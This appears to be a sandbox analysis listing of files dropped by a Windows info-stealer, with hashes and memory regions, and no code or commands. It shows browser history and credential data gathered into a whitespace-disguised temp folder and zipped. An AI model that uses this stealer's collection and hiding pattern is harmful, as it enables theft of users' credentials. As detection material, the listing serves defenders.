SHA1 07f092ae1b1efd378424ba1b9f639e37d1dc8cb9
SHA256 290c0a19cd41e8b8570b8b19e09c0e5b1050f75f06450729726193cf645e406c
SHA512 8e785085640db504496064a3c3d1b72feab6b3f0bc33676795601a67fcf410baa9a6cd79f6404829b47fd6afcd9a75494d0228d7109c73d291093cd6a42447ff

C:\Users\Admin\AppData\Local\Temp\_MEI56722\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI56722\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI56722\libssl-3.dll

MD5 b2e766f5cf6f9d4dcbe8537bc5bded2f
SHA1 331269521ce1ab76799e69e9ae1c3b565a838574
SHA256 3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4
SHA512 5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

C:\Users\Admin\AppData\Local\Temp\_MEI56722\libcrypto-3.dll

MD5 8377fe5949527dd7be7b827cb1ffd324
SHA1 aa483a875cb06a86a371829372980d772fda2bf9
SHA256 88e8aa1c816e9f03a3b589c7028319ef456f72adb86c9ddca346258b6b30402d
SHA512 c59d0cbe8a1c64f2c18b5e2b1f49705d079a2259378a1f95f7a368415a2dc3116e0c3c731e9abfa626d12c02b9e0d72c98c1f91a359f5486133478144fa7f5f7

C:\Users\Admin\AppData\Local\Temp\_MEI56722\blank.aes

MD5 dd5697ef9445eefff6235489bac86de3
SHA1 0acf2654dab2ff558759fd8cf8a34b36b79db7e9
SHA256 78f15d8e609ef9212fcbfae84fa2693580a6140035973a663563adb581b91f17
SHA512 929ded38edc41af415da1ce05b9e8b15488164fa46ab09dfd654e9ab2318edf00bb3158c70cb0a21920e643ec68f0702e331ec1b6cde793493ffd8c8b5a982bf

memory/5856-244-0x00007FFEDC4B0000-0x00007FFEDC4BF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 fe1dd5ff63e3b5b4f7480710d1b45d8b
SHA1 1f6469f66a5b4da1d4d1c73d46ceb085ef1d51c8
SHA256 1b2987f0afc5f712f15fd43a604c7e4779c50f72a1c1fd076b5908abaa0dd650
SHA512 b97c205eceb50312fd02e9d9168c3ebc08777b9f8b17590424ac0a3e217fa4a0303247ca9b8331339ce8f32da2a9ec42f240870a97ab922cceb0644376b5d1cc

memory/5856-271-0x00007FFEC77A0000-0x00007FFEC77CC000-memory.dmp

memory/5856-273-0x00007FFEC4840000-0x00007FFEC4859000-memory.dmp

memory/5856-275-0x00007FFEC45C0000-0x00007FFEC45E4000-memory.dmp

memory/5856-277-0x00007FFEC4440000-0x00007FFEC45BF000-memory.dmp

memory/5856-279-0x00007FFEC4420000-0x00007FFEC4439000-memory.dmp

memory/5856-281-0x00007FFED6810000-0x00007FFED681D000-memory.dmp

memory/5856-283-0x00007FFEC43E0000-0x00007FFEC4413000-memory.dmp

memory/5856-286-0x00007FFEC1760000-0x00007FFEC1E22000-memory.dmp

memory/5856-288-0x00007FFEC1220000-0x00007FFEC1753000-memory.dmp

memory/5856-289-0x00007FFEC4310000-0x00007FFEC43DE000-memory.dmp

memory/5856-287-0x00007FFED61F0000-0x00007FFED6215000-memory.dmp

memory/5856-293-0x00007FFED6660000-0x00007FFED666D000-memory.dmp

memory/5856-291-0x00007FFEC42F0000-0x00007FFEC4304000-memory.dmp

memory/5856-295-0x00007FFEC41D0000-0x00007FFEC42EA000-memory.dmp

memory/5448-296-0x000001EFFC6F0000-0x000001EFFC712000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u42ytz0b.eql.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5856-315-0x00007FFEC45C0000-0x00007FFEC45E4000-memory.dmp

memory/5856-321-0x00007FFEC4440000-0x00007FFEC45BF000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

MD5 868073ac13021dd170c960900855d40e
SHA1 d689fcc1c54922bd8cd2d89bd0de07a337bd0825
SHA256 deb18bdfc2f28951b7d3d72f48343b1d528c186737084bc9e71533428d770044
SHA512 85a2a10850d0ba27d4dbcc8693819d8a0b286d858108e92d45b82b7b201a8bcadf522a713125030d1f8ef1874ad4e23a95b4968d03698decfad24a9de199c393

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

memory/5856-336-0x00007FFEC4420000-0x00007FFEC4439000-memory.dmp

memory/5856-347-0x00007FFEC43E0000-0x00007FFEC4413000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

MD5 0353daebeae981d02e84d6cfaef1b091
SHA1 e390e2d4aae27811973cf4c3c05d219d3601fbd5
SHA256 f2fe780cf70d9fe8b71242e65aee34ff577ca530c82423f18edbb315471bc017
SHA512 acd169eed562b1122ec3aee95194d291798d5163b45bc714d12966cca595c1b96f59c61af622282164cfd242f40f2c0cd37585b07edb04a3ba240ac6ae5ac8ef

memory/5856-360-0x00007FFEC1220000-0x00007FFEC1753000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6f3b96b24f06e2d37a46e43e8b784f56
SHA1 7be6702c5867f359e913eeeecdd5b76698589295
SHA256 8e386afeed28e1d282d9a0294dd2e9402dcb807f7c77aca8426314c20057e720
SHA512 d760999531a77a9adf2b4dc019ce3b43ac3a8cad825398b3a09818afe8deaa177d37219a26dd8a432c00c9cff7858efc43cae2375edc996bb0136c92c39c9dfb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a28115a0b99e1628f4b22fe751626704
SHA1 f6c1a3bb1c46eea1d8ac31551e3b91b2004fc57e
SHA256 8fe0f9cb43d348eeb8de56f9ccca2ca5b787978f2e41b861bb04a5b134839f60
SHA512 7ee7051a3dbe621096dcf7c3b2c0ccd6c5ca30729bf3322597b74e8299c742a5653c73b9a7013a2565dc7a0da3de0af4a6fb4c38417748469983bf1117b16ee1

memory/5856-382-0x00007FFEC4310000-0x00007FFEC43DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\   ‌      \Credentials\Edge\Edge History.txt

MD5 f9f67e95c74661d57dc2387e20545315
SHA1 de666880aa779f7c6baa57ca95f1d2c9d1fafed7
SHA256 39519b652992d965cda2be29be1ff6c3dde37c900aa420600d19d43585f39263
SHA512 4ef6273145b0ff830383d1c61e1f1761fa445f20dd387d1a156a4745ff4bcce58b7d3693a16922c44280823c693107517a3b62314f8b175cc0f2518acbc3cb96

C:\Users\Admin\AppData\Local\Temp\YFIex.zip

MD5 6d218c5a72bbf8ea81871fdcf0099d0c
SHA1 86d79be08f6a6f30bd2b86d709de04d746657e1d
SHA256 644360db7b673fbea35a6b8138f749c2c983dfed9a97ccfb165f54b5e5631c54
SHA512 5045d8e7cd83186460566c7b6cbb4972dfe161a4d56e770b423b119b6754f57521fd8f8450755ddfe4b683a90b93bb80bdf53e4398973b2e059b92519a2f7c47

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5423eae8a66353bd7e5a09531a03c014
SHA1 3ca22804ba343bd0dc2b2124990b082c024b7b3c
SHA256 a6066c1711139e9e4844faf543d5818a4613d6c1baeb8040aaca15c19ca3339f
SHA512 20e952424eb88f8268510c6b1de19ce796a624a19a4460fcaab915993a5c324c176e56d66eb8735a2c81731077868c6018ec938ac7215d739c9fa96a1182f515

memory/5856-404-0x00007FFEC4440000-0x00007FFEC45BF000-memory.dmp

memory/5856-398-0x00007FFEC1760000-0x00007FFEC1E22000-memory.dmp

memory/5856-413-0x00007FFED6660000-0x00007FFED666D000-memory.dmp

memory/5856-412-0x00007FFEC41D0000-0x00007FFEC42EA000-memory.dmp

memory/5856-399-0x00007FFED61F0000-0x00007FFED6215000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c6aae9fb57ebd2ae201e8d174d820246
SHA1 58140d968de47bcf9c78938988a99369bbdb1f51
SHA256 bbc39a8da61fd8ec0d64e708e1ab4986f7fdf580581e464629bf040c595f7c08
SHA512 5959f7dab47bc4bad03635f497ca48f2e0740375528afddfc50964e54983e56df5970b25b8d8b28f1aa73cd6233fac83c634a311e759c58a365570e4862c3e3c

memory/5856-426-0x00007FFEC1760000-0x00007FFEC1E22000-memory.dmp

memory/5856-450-0x00007FFEC43E0000-0x00007FFEC4413000-memory.dmp

memory/5856-454-0x00007FFEC41D0000-0x00007FFEC42EA000-memory.dmp

memory/5856-453-0x00007FFED6660000-0x00007FFED666D000-memory.dmp

memory/5856-452-0x00007FFEC42F0000-0x00007FFEC4304000-memory.dmp

memory/5856-451-0x00007FFEC1220000-0x00007FFEC1753000-memory.dmp

memory/5856-449-0x00007FFED6810000-0x00007FFED681D000-memory.dmp

memory/5856-448-0x00007FFEC4420000-0x00007FFEC4439000-memory.dmp

memory/5856-447-0x00007FFEC4440000-0x00007FFEC45BF000-memory.dmp

memory/5856-446-0x00007FFEC45C0000-0x00007FFEC45E4000-memory.dmp

memory/5856-445-0x00007FFEC4840000-0x00007FFEC4859000-memory.dmp

memory/5856-444-0x00007FFEC77A0000-0x00007FFEC77CC000-memory.dmp

memory/5856-443-0x00007FFED61F0000-0x00007FFED6215000-memory.dmp

memory/5856-442-0x00007FFEDC4B0000-0x00007FFEDC4BF000-memory.dmp

memory/5856-441-0x00007FFEC4310000-0x00007FFEC43DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI56722\blank.aes

MD5 d059e60459d101bfac21a70829cceb4f
SHA1 7871b34d3687c8398a3296d33642394167fb3ac2
SHA256 3cbe49fcb0d96b754d684f9435881c9d367f555d17a3df820bc6b206448a4251
SHA512 4dca7ee2b4ca857a33780d29e5419e4dc27fedd5bfa5e003d5b1126d46a7bc3e9c7d678bfdc016cd681c923ae5b494a4634c3f3bd4340574600a89db047af88d